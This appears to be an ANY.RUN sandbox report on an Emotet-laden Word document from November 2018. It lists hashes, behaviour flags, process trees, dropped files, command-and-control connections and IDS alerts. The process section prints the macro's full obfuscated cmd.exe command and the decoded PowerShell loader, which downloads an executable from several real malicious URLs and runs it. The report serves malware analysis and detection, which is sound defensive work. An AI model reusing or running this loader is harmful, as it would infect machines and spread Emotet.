analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Rech_1RX979374.doc

Full analysis: https://app.any.run/tasks/3b0f5a6e-ccb2-4c4a-acbc-74c7979ed5fe
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: November 15, 2018, 11:56:28
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 15 08:07:00 2018, Last Saved Time/Date: Thu Nov 15 08:07:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

09453B92D9852BC65B58E7E2B5A1BB96

SHA1:

5F13D0DD02F017453CF6D19F97E717B0B817C61F

SHA256:

944FE327050FDC320C67D34803F9D99A334F0D581B5CCFA3B8E9DC1C0B18810F

SSDEEP:

1536:Shcv/qAocn1kp59gxBK85fBt+a9aK4GggyVoreRGKRZ:Dvo41k/W485jK7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2972)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2972)
    • Application was dropped or rewritten from another process

      • VzO.exe (PID: 1428)
      • VzO.exe (PID: 2144)
      • lpiograd.exe (PID: 2284)
      • lpiograd.exe (PID: 3600)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2536)
    • Emotet process was detected

      • lpiograd.exe (PID: 2284)
  • SUSPICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 3824)
    • Creates files in the user directory

      • powershell.exe (PID: 2536)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2536)
      • VzO.exe (PID: 1428)
    • Reads Internet Cache Settings

      • powershell.exe (PID: 2536)
    • Starts itself from another location

      • VzO.exe (PID: 1428)
    • Connects to unusual port

      • lpiograd.exe (PID: 3600)
    • Application launched itself

      • lpiograd.exe (PID: 2284)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2972)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:15 08:07:00
ModifyDate: 2018:11:15 08:07:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
7
Malicious processes
6
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs powershell.exe vzo.exe no specs vzo.exe #EMOTET lpiograd.exe no specs lpiograd.exe

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rech_1RX979374.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3824c:\YonojBKjUHvLjs\hkIWYWfYsE\iZnwMUiciVXpjl\..\..\..\windows\system32\cmd.exe /C"s^e^t ^E^Y^l=/&&s^e^t ^a^TN=^e&&^s^e^t ^q^8C=^;&&se^t ^J^mF^d=^I&&s^e^t 2^D=^0&&s^e^t 2^zC^A=^d(&&se^t ^a^9J^U=^m/mT&&^s^e^t ^Uv=^w&&^s^e^t ^E^5R=^ &&^set ^u^WNI=^K&&^set ^qm^9=^ &&^se^t ^27^Y=^X^DC&&^s^e^t c^M=0);&&^s^et nNs=^W^fM,&&^s^et dO^X=^j&&^s^et ^Hn^j=^xe&&^s^et ^1U=^u^m^p&&^se^t mz^b^G=^z^f=^'h&&^s^et ^s^e^D^F=^te^m&&^s^e^t ^uN==&&^se^t ^YV^p^H=^M^@&&^s^e^t ^E^Q^z=^.&&^s^et ^u1=^p://^1^5^9.&&^s^et ^0^4^G=6^5&&^se^t ^g^J=^d&&^s^e^t ^TiC^z=P^a&&s^e^t ^d^A^Ho=c&&^s^e^t ^PE^f=n&&^s^et ^gG=r^e&&^se^t ^9^Xo=^h^e&&^se^t d^Z^p=^ &&^se^t ^h^oV=(&&^s^et HE^K^u=O^b&&^s^et ^4^M=^'LO^E&&^se^t ^7U^Z3=^@h&&s^e^t ^a^tc=/&&^s^e^t ^W^ag^P=^t&&^se^t d^It^w=^W&&se^t ^YCc=^')&&^s^et ^At=m^p^P^a^th&&^s^et Q^a=^d^i&&s^e^t m^h=^-&&^s^et ^U9^fA=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t G^BZ^D=t^-^Pro&&^se^t N^d=h^x&&s^e^t ^t3=^7x&&s^e^t nN=^-&&s^e^t h^k=^'&&s^e^t q^w^J=re&&^s^e^t ^ui=^e&&^s^e^t V^f=^G&&^s^et K^b^Sn=^T&&^s^e^t s^Zp^G=N&&^s^e^t Y^q^X=^l&&^s^e^t ^6^Xq=('^@^'&&^s^e^t ^E9^X=^w&&^se^t ^w^L8^Z=^.c^o.^u&&^s^e^t P^9^h^1=^a&&^s^et K^A^l^4=)^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t n^F=h^{&&s^e^t ^H^d=/&&^s^et V^J^x=r&&^s^et ^1R^B=^2^P&&s^e^t ^0^M=^o&&^s^et ^6R^wX=^E&&^s^e^t ^J^Iy=p^o^w^er&&^se^t J^d=^tp&&^se^t ^hk^4M=^ &&^se^t ^Q^k^4J=^a&&^s^et ^S^d^D=^://&&^se^t ^7^3=^:&&s^e^t ^4DZ=^p&&^se^t ^QV^L=^h&&^se^t n^A^20=^T^l^l^U&&^se^t ^1m=^s&&^s^e^t h^6=n^s&&s^e^t u^G^D=^K=([^S&&^s^et ^Gm^g=^Ge^tT&&^s^e^t C^aR^Z=k&&^set ^9^KCT=^6^a&&s^e^t ^s^hH^D=^;^S&&^se^t ^sQ^0r=^ty^pe&&^s^et c^s^h=)&&s^e^t ^Az^I3=^do&&s^e^t ^JV^8=^a^m&&s^e^t ^3^K=^t^ar&&^s^et ^7^4=^ &&^s^e^t q^T^j^t=^2^.&&^se^t ^M^k=^ &&s^e^t ^m^S=^so&&s^e^t ^d0=b&&^se^t ^0^8^b7=^;&&^s^e^t ^k^On=^=^ &&s^e^t ^9^MH=^s^t&&^s^et V^x^O=aI^Z&&se^t n^m=^t&&^se^t ^m^u^J=^;b&&^s^e^t V^J=^t&&^s^e^t V^e^x=^h&&^s^et v^0=O^.^e&&s^e^t ^9^3O=^:&&^se^t kC^g^7= ^ ^ &&s^e^t C^5^0=^s&&s^e^t ^D^4=;^$m^k&&^s^e^t ^U^Hcr=^.^1^7&&s^e^t ^J^z^a=^tt&&^se^t ^K^YT=^.s^av&&^se^t Y^FC=^m&&s^e^t 8^T^3=^k&&^s^et S^j^M^y= -c^o^m^ &&^se^t K^U^W=^.S&&^se^t Q^3=:^:&&^se^t ^61=1^;^$V&&^se^t ^8Bm^z=^w.&&^se^t N^Ea^h=^'^\V&&set ^D^5^dR=^ &&^s^et 9^wG^Y= &&^set A^d^Z=^K)&&s^e^t C^b^Wa=^u&&s^e^t kw^K^l=r&&^s^et ^S^q^z=/&&s^et ^3h^F=($^W^fM&&^s^e^t k^l^J=f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t 7^X^I^B=y^s&&^se^t 0^k=^z&&s^e^t ^HN=^Q&&set ^EZ=^.&&s^e^t ^u^Hr^Z=^ &&^s^et ^Y2^3n=^$^Tz^f&&^se^t a^q=^d^a&&^se^t ^g^mi^d=^-&&^se^t ^EX^ts=^o^p^en()&&^s^et 1nr=^-&&^s^e^t n^Q^T=(&&^s^et P^M^sf=^b^u^d^im&&^s^e^t K3^8^2=^ &&^se^t ^6^Z^W=^.&&se^t ^JC=^in&&^set ^KE=^l&&^s^et ^Dv=^ga&&^set ^y1=^'&&s^e^t ^KO=d^y)^;f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^et n^4^o=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t 1^p^0P=^h^]&&^s^e^t g^9^o=^JQ^ &&s^et ^T^1=^.&&s^e^t V^f^W^Q=N&&^se^t ^k1=^t^p'&&s^e^t ^svL^h=^'G^E^T',&&^s^et J^a^F=^@^h^t&&^s^et ^97^t=^'&&s^e^t ^7^f^Q=^l^a&&^se^t ^eB^Y8=^DA&&s^e^t ^aV^qn=^m/&&^s^e^t 6Z^Q^l=^ ^ &&s^e^t ^j^q^5=^ll&&^s^et ^j5^iv=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^e^t ^Ww^Om=^ &&s^e^t w^GM=^o&&s^e^t ^6r=^.^17&&se^t 4^k='^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^6^P=^tc&&^s^et V^a=^O&&^set c^l=^x&&^se^t ^t^8r^s=^;&&s^e^t n^7=^2&&^se^t ^d^u^1=^s&&s^e^t ^h^qJ^2=ec^t^ &&s^e^t ^PR=^z&&s^et ^S^k^m=^p&&^s^e^t ^yR8=c^e^s^s&&^se^t N^l=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^et K^Z=^.&&^s^et ^Q^fp=^y{^$z&&s^e^t ^Jj^2=b^5&&s^e^t ^pS^6=^J^Q^.&&^s^e^t C^M6=r&&^s^et ^sh^1=^}&&^se^t P^t=V&&^se^t C^X=n&&^se^t ^u^k3=^e&&^s^e^t ^Wmz^e=^j&&^s^e^t ^WF^9w=^i^t&&^set ^Tq=^l&&^se^t ^4^A^q^6=^s&&^s^e^t ^hZ=^.&&^s^et ^Q^t^Js=^e&&s^e^t ^Kr^Pd=^an&&^s^e^t ^yY=c^a&&^s^e^t ^mT^1^Y=^ac^h&&^se^t NC^I=^g&&^s^e^t C^2=^ ^=&&^s^e^t ^JMr^0=^en&&^s^et ^a^o7Y=9&&s^e^t ^Ja^M=^J&&^s^et ^HCE^S=^ &&^se^t W^M^g^l=^l&&^se^t s^h^m=p:/&&^s^e^t ^6^k4=^a&&^s^e^t ^p^8^W=^wr^it&&^s^e^t g^8=^s&&^s^e^t D^p^l=V^J^Q&&^s^e^t ^e^o=^.^us/^D^A^gO&&s^e^t ^W^4O^o=^J&&^se^t 2^l^d^A=^w&&s^e^t ^pR^F^w=tof^i^l^e&&^s^et ^T^e^9u=^kK&&^se^t ^E^8x=^';f&&^se^t ^m^w^P=^ew&&^se^t y^k=^t&&^se^t ^H^O^U=t^t&&s^e^t ^wp^H=^s&&^set ^D0^q=^.^IO.&&^s^e^t ^Qs=c^o&&^se^t ^9^s^p=^$^zj^s&&^se^t ^Yd=^u&&^s^e^t C^s^X=^.&&^se^t ^tT^fN=^z&&^se^t a^s^q=^e&&^se^t ^U^3=^ &&s^e^t S^G^z=^b^@^h^tt^p&&s^e^t a^f= &&^s^e^t ^8^UL=^bj&&^se^t Ad^6^b=e^B^o&&^s^e^t ^2^I^o=^ms&&s^e^t ^k^4^7G=^e&&^se^t ^a5^KO=}^ &&s^e^t ^6^9D^0=^Q&&^s^et ^9^ET=/^8nT&&s^e^t ^Uvm^Y=^j&&s^e^t ^2^7S=^j&&^se^t V^O^D^5=V&&^se^t ^24=^ &&^s^et ^2I=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^aFU^X=^$m&&^s^e^t ^Y^s=^or&&s^e^t ^k^hp=//&&^s^et vZR^M=^ $^m&&^se^t ^A^d=i^.c^o&&^s^et v^y^M=u^f^f&&^se^t N^m^Z=s^p^on&&^s^e^t Vh^x^8=^xm&&s^e^t Ai^K^W=^e&&s^e^t ^9^He=t^i&&^s^et ^M^Q^Y^3=^o&&^s^e^t ^q8=^}&&^se^t c^I^wR=c^t&&s^et ^AY^H^8=^4^p&&^s^et 7^3^S^F=){^t&&^s^et ^j^d^Y=)&&^s^e^t g^q^Qi=^m^ic&&^se^t C^4=^ &&^s^et J^M=^p&&^se^t ^m^9=^en(&&^s^e^t C^Gv^J=m^l&&s^e^t ^y^GC=^+&&s^e^t ^H^G^Y=V&&^s^et 0^e=^e(&&^s^e^t ^4L=^=&&c^a^l^l s^e^t vkzC=%^J^Iy%%g^8%%^9^Xo%%^j^q^5%%C^4%%^2I%%V^f%%^7^f^Q%%^4L%%^4^M%%4^k%%K^b^Sn%%mz^b^G%%V^J%%J^d%%^7^3%%^S^q^z%%^a^tc%%^Uv%%2^l^d^A%%^8Bm^z%%^Dv%%v^y^M%%^w^L8^Z%%NC^I%%^9^ET%%n^A^20%%^27^Y%%^7U^Z3%%^H^O^U%%^u1%%^0^4^G%%^U^Hcr%%n^7%%^6r%%^H^d%%^AY^H^8%%^1R^B%%^6R^wX%%d^It^w%%^PE^f%%S^G^z%%^9^3O%%^k^hp%%V^J^x%%^1U%%^Yd%%C^X%%P^M^sf%%^Kr^Pd%%^EZ%%^d^A^Ho%%^M^Q^Y^3%%^a^9J^U%%^Jj^2%%^9^KCT%%^a^o7Y%%^YV^p^H%%V^e^x%%^J^z^a%%s^h^m%%^E^Y^l%%a^q%%m^h%%^6^k4%%g^q^Qi%%^A^d%%^aV^qn%%^u^WNI%%2^D%%^Tq%%V^x^O%%^J^mF^d%%J^a^F%%^W^ag^P%%J^M%%^S^d^D%%^a^TN%%Q^a%%^m^S%%Y^q^X%%C^b^Wa%%^9^He%%^0^M%%h^6%%^e^o%%N^d%%^t3%%^eB^Y8%%^y1%%K^U^W%%^4DZ%%W^M^g^l%%^WF^9w%%^6^Xq%%^j^d^Y%%^D^4%%u^G^D%%7^X^I^B%%^s^e^D^F%%^D0^q%%^TiC^z%%n^m%%1^p^0P%%Q^3%%^Gm^g%%^u^k3%%^At%%^h^oV%%c^s^h%%^y^GC%%N^Ea^h%%^PR%%v^0%%^Hn^j%%^YCc%%^t^8r^s%%N^l%%0^k%%^Wmz^e%%^1m%%^qm^9%%^uN%%s^Zp^G%%^m^w^P%%1nr%%HE^K^u%%^2^7S%%^ui%%c^I^wR%%S^j^M^y%%h^k%%^2^I^o%%c^l%%C^Gv^J%%q^T^j^t%%Vh^x^8%%^KE%%^QV^L%%y^k%%^k1%%^q^8C%%^j5^iv%%V^O^D^5%%g^9^o%%^k^On%%V^f^W^Q%%^k^4^7G%%^E9^X%%nN%%V^a%%^8^UL%%^h^qJ^2%%^g^mi^d%%^Qs%%Y^FC%%^E^5R%%^97^t%%P^9^h^1%%^Az^I3%%^g^J%%^d0%%^6^Z^W%%^9^MH%%C^M6%%a^s^q%%^JV^8%%^E^8x%%^Y^s%%^Q^t^Js%%^mT^1^Y%%^3h^F%%a^f%%^JC%%^hk^4M%%^Y2^3n%%7^3^S^F%%kw^K^l%%^Q^fp%%^Uvm^Y%%C^5^0%%^T^1%%w^GM%%^S^k^m%%^m^9%%^svL^h%%^U9^fA%%nNs%%c^M%%n^4^o%%^tT^fN%%dO^X%%^wp^H%%^hZ%%^4^A^q^6%%^JMr^0%%2^zC^A%%K^A^l^4%%^H^G^Y%%^W^4O^o%%^HN%%C^s^X%%^EX^ts%%^0^8^b7%%k^l^J%%D^p^l%%^E^Q^z%%^sQ^0r%%C^2%%^HCE^S%%^61%%^pS^6%%^p^8^W%%0^e%%^9^s^p%%K^Z%%^gG%%N^m^Z%%^d^u^1%%Ad^6^b%%^KO%%P^t%%^Ja^M%%^6^9D^0%%^K^YT%%Ai^K^W%%^pR^F^w%%n^Q^T%%^aFU^X%%C^aR^Z%%A^d^Z%%^s^hH^D%%^3^K%%G^BZ^D%%^yR8%%vZR^M%%^T^e^9u%%^m^u^J%%q^w^J%%^Q^k^4J%%8^T^3%%^sh^1%%^yY%%^6^P%%n^F%%^q8%%^a5^KO%%kC^g^7%%K3^8^2%%^D^5^dR%%^u^Hr^Z%%^M^k%%^U^3%%d^Z^p%%^Ww^Om%%9^wG^Y%%6Z^Q^l%%^24%%^7^4%&&c^al^l %v^k^zC%" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2536powershell $Gla='LOE';$Tzf='http://www.gauff.co.ug/8nTTllUXDC@http://159.65.172.17/4p2PEWnb@http://rumpunbudiman.com/mTb56a9M@http://da-amici.com/K0laIZI@http://edisolutions.us/DAgOhx7xDA'.Split('@');$mkK=([System.IO.Path]::GetTempPath()+'\VzO.exe');$zjs =New-Object -com 'msxml2.xmlhttp';$VJQ = New-Object -com 'adodb.stream';foreach($WfM in $Tzf){try{$zjs.open('GET',$WfM,0);$zjs.send();$VJQ.open();$VJQ.type = 1;$VJQ.write($zjs.responseBody);$VJQ.savetofile($mkK);Start-Process $mkK;break}catch{}} C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2144"C:\Users\admin\AppData\Local\Temp\VzO.exe" C:\Users\admin\AppData\Local\Temp\VzO.exepowershell.exe
User:
admin
Company:
Mic
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.7600
1428"C:\Users\admin\AppData\Local\Temp\VzO.exe"C:\Users\admin\AppData\Local\Temp\VzO.exe
VzO.exe
User:
admin
Company:
Mic
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.7600
2284"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
VzO.exe
User:
admin
Company:
Mic
Integrity Level:
MEDIUM
Exit code:
0
Version:
6.1.7600
3600"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe"C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe
lpiograd.exe
User:
admin
Company:
Mic
Integrity Level:
MEDIUM
Version:
6.1.7600
Total events
1 684
Read events
1 268
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9C6A.tmp.cvr
MD5:
SHA256:
2536powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SUKSM3D4SJ9BPKAMBD0.temp
MD5:
SHA256:
2972WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:F12123BE3FC217E2B306FA7D3C1EF718
SHA256:3C767FE8FEA3E2CCF71ADDB57BE518569265124015C279DC07A0A438B8E20F32
2536powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5dab01.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2536powershell.exeC:\Users\admin\AppData\Local\Temp\VzO.exeexecutable
MD5:8CD15B121E2DE298A2D4127DA06CB0CA
SHA256:FA4D8A197C9B016BDB493C368EF0DBBEAE83D8C0D786201FACF1BA7EB8FB7F71
1428VzO.exeC:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exeexecutable
MD5:8CD15B121E2DE298A2D4127DA06CB0CA
SHA256:FA4D8A197C9B016BDB493C368EF0DBBEAE83D8C0D786201FACF1BA7EB8FB7F71
2536powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
2536powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
2972WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ch_1RX979374.docpgc
MD5:B8A250C8D18F3C2ADDE6896BA1D20C95
SHA256:73EDC43675A52329D7EDAA9671C44720D3B19D4B179BD1B3CAA11B7651225043
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3600
lpiograd.exe
GET
177.242.156.119:80
http://177.242.156.119/
MX
malicious
2536
powershell.exe
GET
200
41.190.153.18:80
http://www.gauff.co.ug/8nTTllUXDC/
MU
executable
452 Kb
malicious
2536
powershell.exe
GET
301
41.190.153.18:80
http://www.gauff.co.ug/8nTTllUXDC
MU
html
374 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3600
lpiograd.exe
177.242.156.119:80
SERVICIO Y EQUIPO EN TELEFONÍA INTERNET Y TV S.A. DE C.V.
MX
malicious
3600
lpiograd.exe
50.78.167.65:7080
Comcast Cable Communications, LLC
US
malicious
2536
powershell.exe
41.190.153.18:80
www.gauff.co.ug
INFOCOM-
MU
suspicious

DNS requests

Domain
IP
Reputation
www.gauff.co.ug
  • 41.190.153.18
malicious

Threats

PID
Process
Class
Message
2536
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2536
powershell.exe
A Network Trojan was detected
ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2
2536
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info